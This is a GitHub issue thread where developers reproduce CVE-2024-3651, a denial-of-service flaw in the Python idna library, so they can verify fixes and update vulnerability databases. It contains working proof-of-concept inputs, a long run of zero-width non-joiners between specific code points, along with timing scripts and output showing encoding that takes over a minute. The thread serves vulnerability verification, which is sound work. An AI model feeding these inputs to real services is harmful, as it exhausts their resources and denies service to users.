Reproducer for CVE-2024-3651 #175

Closed
frenzymadness opened this issue Apr 17, 2024 · 7 comments

@frenzymadness

Hello.

I'm trying to verify the fix for CVE-2024-3651 and I'm not able to come up with an input for idna.encode that would cause significant resource consumption or that would take significantly longer to compute on version 3.6 vs 3.7.

When I try something like (derived from tests):

zwnj = '\u200c'
latin = '\u0061'

idna.encode(latin * 1000 + zwnj)

In the cProfile output I can see that some functions are called many times, but that doesn't make a significant difference to the execution time.

In 3.6:

$ python3 -m cProfile -s ncalls poc.py | head

         14231 function calls (14181 primitive calls) in 0.005 seconds

   Ordered by: call count

   ncalls  tottime  percall  cumtime  percall filename:lineno(function)
     5007    0.000    0.000    0.000    0.000 {built-in method builtins.ord}
     2003    0.000    0.000    0.000    0.000 intranges.py:35(_decode_range)
1096/1095    0.000    0.000    0.000    0.000 {built-in method builtins.len}
     1024    0.000    0.000    0.000    0.000 {method 'get' of 'dict' objects}
     1002    0.001    0.000    0.001    0.000 intranges.py:39(intranges_contain)

In 3.7:

$ python3 -m cProfile -s ncalls poc.py | head

         9337 function calls (9284 primitive calls) in 0.018 seconds

   Ordered by: call count

   ncalls  tottime  percall  cumtime  percall filename:lineno(function)
     2003    0.000    0.000    0.000    0.000 intranges.py:35(_decode_range)
1096/1095    0.000    0.000    0.000    0.000 {built-in method builtins.len}
     1011    0.000    0.000    0.000    0.000 {built-in method builtins.ord}
     1002    0.001    0.000    0.001    0.000 intranges.py:39(intranges_contain)
     1002    0.000    0.000    0.000    0.000 intranges.py:32(_encode_range)
@guidovranken

import idna
s = "2\u07cd" + ("\u200c"*16384) + "\u07cc"
idna.encode(s)
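
To see how the cost of this input shape grows with its length, one could time it at several sizes. This is a minimal sketch, not part of the original report: the helper names `payload`, `time_encode` and `scaling_table` and the chosen sizes are assumptions made for illustration, and only `idna.encode` comes from the library.

```python
from __future__ import print_function
import time


def payload(n):
    # Same shape as the reproducer: "2", U+07CD, n copies of U+200C, U+07CC.
    # The u"" prefix keeps this a text string on Python 2 as well.
    return u"2\u07cd" + u"\u200c" * n + u"\u07cc"


def time_encode(encode, n):
    # Time one call; the input is invalid anyway, so any exception is ignored
    # and only the elapsed wall-clock time is reported.
    text = payload(n)
    start = time.time()
    try:
        encode(text)
    except Exception:
        pass
    return time.time() - start


def scaling_table(encode, sizes=(500, 1000, 2000, 4000)):
    # Returns a list of (number of joiners, seconds) pairs.
    return [(n, time_encode(encode, n)) for n in sizes]


if __name__ == "__main__":
    try:
        import idna
    except ImportError:
        print("idna is not installed")
    else:
        for n, seconds in scaling_table(idna.encode):
            print(n, "joiners:", round(seconds, 3), "s")
```

If the time roughly quadruples each time the size doubles, the installed version is probably affected. If it stays near zero, the input is probably being rejected early.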

@kjd kjd closed this as completed Apr 17, 2024
@antoniotorresm

Hi, @kjd

We've tried reproducing this CVE on an older version of idna (2.4), which is the version currently shipped in RHEL7, using the following script:

import idna
import time

s = "2\u07cd" + "\u200c" * 4004 + "\u07cc"

print("If vulnerable, it'll take seconds to finish")

start = time.time()

try:
    idna.encode(s)
except Exception as e:
    print(type(e)," raised")

end = time.time()
total = end - start
print("It took", total, " seconds")

if total > 1:
    print("VULNERABLE")
else:
    print("FIXED") 

However, it fails with a different exception:

# python poc.py  
If vulnerable, it'll take seconds to finish
(<class 'idna.core.IDNAError'>, ' raised')
('It took', 0.0005650520324707031, ' seconds')
FIXED

The CVE page states that this issue affects all versions of idna. Is there a better input that would help reproduce the issue on RHEL7? Or is this just an unrelated error, and this version is actually not vulnerable?

@frenzymadness
Author

That information would help to update this page: GHSA-jjg7-2v4v-x38h and other CVE databases.

@guidovranken

Seems pretty slow to me:

jhg@hank:~/idna-2.4-repro$ python3 -m venv venv
jhg@hank:~/idna-2.4-repro$ source venv/bin/activate
(venv) jhg@hank:~/idna-2.4-repro$ pip install idna==2.4
Collecting idna==2.4
  Downloading idna-2.4-py2.py3-none-any.whl (55 kB)
     |████████████████████████████████| 55 kB 5.3 MB/s 
Installing collected packages: idna
Successfully installed idna-2.4
(venv) jhg@hank:~/idna-2.4-repro$ cat repro.py 
import idna
s = "2\u07cd" + ("\u200c"*16384) + "\u07cc"
idna.encode(s)
(venv) jhg@hank:~/idna-2.4-repro$ time python3 repro.py 
Traceback (most recent call last):
  File "repro.py", line 3, in <module>
    idna.encode(s)
  File "/home/jhg/idna-2.4-repro/venv/lib/python3.8/site-packages/idna/core.py", line 355, in encode
    result.append(alabel(label))
  File "/home/jhg/idna-2.4-repro/venv/lib/python3.8/site-packages/idna/core.py", line 276, in alabel
    check_label(label)
  File "/home/jhg/idna-2.4-repro/venv/lib/python3.8/site-packages/idna/core.py", line 255, in check_label
    check_bidi(label)
  File "/home/jhg/idna-2.4-repro/venv/lib/python3.8/site-packages/idna/core.py", line 85, in check_bidi
    raise IDNABidiError('First codepoint in label {0} must be directionality L, R or AL'.format(repr(label)))
(...lots of garbage)
real	1m15.866s
user	1m15.865s
sys	0m0.000s
$ python3 --version
Python 3.8.10

I tried your script too; it takes about 4s and says VULNERABLE.

@frenzymadness
Author

Hmm, I think I see the difference. On CentOS 7, python-idna is packaged for Python 2.7.

$ python -V
Python 2.7.18

$ time python poc.py
If vulnerable, it'll take seconds to finish
(<class 'idna.core.IDNAError'>, 'raised')
('It took', 0.0011670589447021484, 'seconds')
FIXED
python poc.py  0.02s user 0.01s system 96% cpu 0.031 total

@guidovranken

It might be worth looking into why that is. If idna is supposed to behave identically on Python 2 and 3 (not sure if it is, I have limited familiarity with this project), then this could indicate some kind of logic bug. Python 2 could be faster than Python 3 in some respects, but the difference in execution times is so pronounced that, with Python 2, the control flow may be bypassing some essential logic in idna. Alternatively, it could indicate a serious performance regression on the part of Python 3.

@frenzymadness
Author

I've investigated this, and idna 2.4 is vulnerable as well, under both Python 2 and Python 3. The difference we saw previously was caused by the bytes/unicode difference in the reproducer: in Python 2 the test string is a bytes object, which causes the encoding process to fail at a different spot. When a unicode string is used, the behavior is identical.
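
A version of the reproducer that passes a text string on both interpreters might look like the sketch below. It is an illustration under stated assumptions, not the exact script used here: the `u""` prefixes are the only substantive change from the earlier script, the helper name `timed` is hypothetical, and the 1-second threshold is carried over from that script. On Python 2 an unprefixed `"\u07cd"` is a byte string in which `\u` is not an escape, so the earlier script never passed the intended code points.

```python
from __future__ import print_function
import time

# The u"" prefix makes this a text (unicode) string on Python 2 and Python 3.
PAYLOAD = u"2\u07cd" + u"\u200c" * 4004 + u"\u07cc"


def timed(func, arg):
    # Call func(arg) and return (elapsed seconds, exception class name or None).
    start = time.time()
    raised = None
    try:
        func(arg)
    except Exception as exc:
        raised = type(exc).__name__
    return time.time() - start, raised


if __name__ == "__main__":
    try:
        import idna
    except ImportError:
        print("idna is not installed")
    else:
        total, raised = timed(idna.encode, PAYLOAD)
        print("Raised:", raised)
        print("It took", total, "seconds")
        # Threshold taken from the earlier script; adjust for slower machines.
        print("VULNERABLE" if total > 1 else "FIXED")
```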
